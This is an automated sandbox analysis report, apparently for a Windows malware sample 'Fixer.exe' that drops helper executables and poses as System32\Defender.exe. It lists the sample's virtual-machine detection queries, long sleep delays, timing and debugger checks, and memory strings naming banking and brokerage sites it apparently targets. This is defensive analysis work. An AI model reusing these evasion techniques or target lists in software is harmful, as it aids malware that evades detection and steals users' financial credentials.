                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\Defender.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Queries memory information (via WMI often done to detect virtual machines)
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
                  Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE PNPClass = &apos;Camera&apos;
                  Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE PNPClass = &apos;Camera&apos;
                  Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE PNPClass = &apos;Camera&apos;
                  Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                  Source: C:\Users\user\Desktop\Fixer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                  Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                  Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                  Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                  Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                  Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                  Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                  Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                  Source: C:\Users\user\Desktop\Fixer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\Fixer.exeMemory allocated: 1940000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeMemory allocated: 32A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeMemory allocated: 52A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeMemory allocated: 980000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeMemory allocated: 1A6F0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeMemory allocated: A80000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeMemory allocated: 1A7D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\System32\Defender.exeMemory allocated: EF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\System32\Defender.exeMemory allocated: 1A9B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\System32\Defender.exeMemory allocated: AE0000 memory reserve | memory write watch
                  Source: C:\Windows\System32\Defender.exeMemory allocated: 1A530000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeCode function: 3_2_00007FF848F270FA rdtsc 3_2_00007FF848F270FA
                  Source: C:\Users\user\Desktop\Fixer.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeWindow / User API: threadDelayed 2546Jump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeWindow / User API: threadDelayed 7174Jump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exe TID: 7088Thread sleep time: -35971150943733603s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe TID: 2616Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exe TID: 6768Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Fixer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\System32\Defender.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\Desktop\Fixer.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: Amcache.hve.14.drBinary or memory string: VMware
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: Amcache.hve.14.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Fixer.exe, 00000000.00000002.2202938412.00000000038B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 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
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: Amcache.hve.14.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: Amcache.hve.14.drBinary or memory string: vmci.sys
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: Amcache.hve.14.drBinary or memory string: VMware20,1
                  Source: Amcache.hve.14.drBinary or memory string: Microsoft Hyper-V Generation Counter
                  Source: Amcache.hve.14.drBinary or memory string: NECVMWar VMware SATA CD00
                  Source: Amcache.hve.14.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                  Source: Amcache.hve.14.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                  Source: Fixer.exe, 00000000.00000002.2248222943.00000000085AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                  Source: Amcache.hve.14.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                  Source: Amcache.hve.14.drBinary or memory string: VMware PCI VMCI Bus Device
                  Source: Amcache.hve.14.drBinary or memory string: VMware VMCI Bus Device
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: Amcache.hve.14.drBinary or memory string: VMware Virtual RAM
                  Source: Amcache.hve.14.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: Amcache.hve.14.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                  Source: Amcache.hve.14.drBinary or memory string: VMware Virtual USB Mouse
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: Amcache.hve.14.drBinary or memory string: vmci.syshbin
                  Source: Amcache.hve.14.drBinary or memory string: VMware, Inc.
                  Source: Amcache.hve.14.drBinary or memory string: VMware20,1hbin@
                  Source: Amcache.hve.14.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: Amcache.hve.14.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: Amcache.hve.14.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: Amcache.hve.14.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                  Source: Amcache.hve.14.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                  Source: Defender.exe, 0000000B.00000002.2591740114.000000001B5CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                  Source: Amcache.hve.14.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                  Source: Amcache.hve.14.drBinary or memory string: vmci.syshbin`
                  Source: Amcache.hve.14.drBinary or memory string: \driver\vmci,\driver\pci
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                  Source: Amcache.hve.14.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: Fixer.exe, 00000000.00000002.2232436978.0000000006858000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<K
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                  Source: Amcache.hve.14.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: Defender.exe, 00000011.00000002.2761764861.000000001B175000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW %SystemRoot%\system32\mswsock.dllchineSettingsSection, SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowDefinition="MachineOnly" allowExeDefinition="MachineOnly"/>
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: Fixer.exe, 00000000.00000002.2202938412.000000000363D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: C:\Users\user\Desktop\Fixer.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\System32\Defender.exeProcess queried: DebugPortJump to behavior
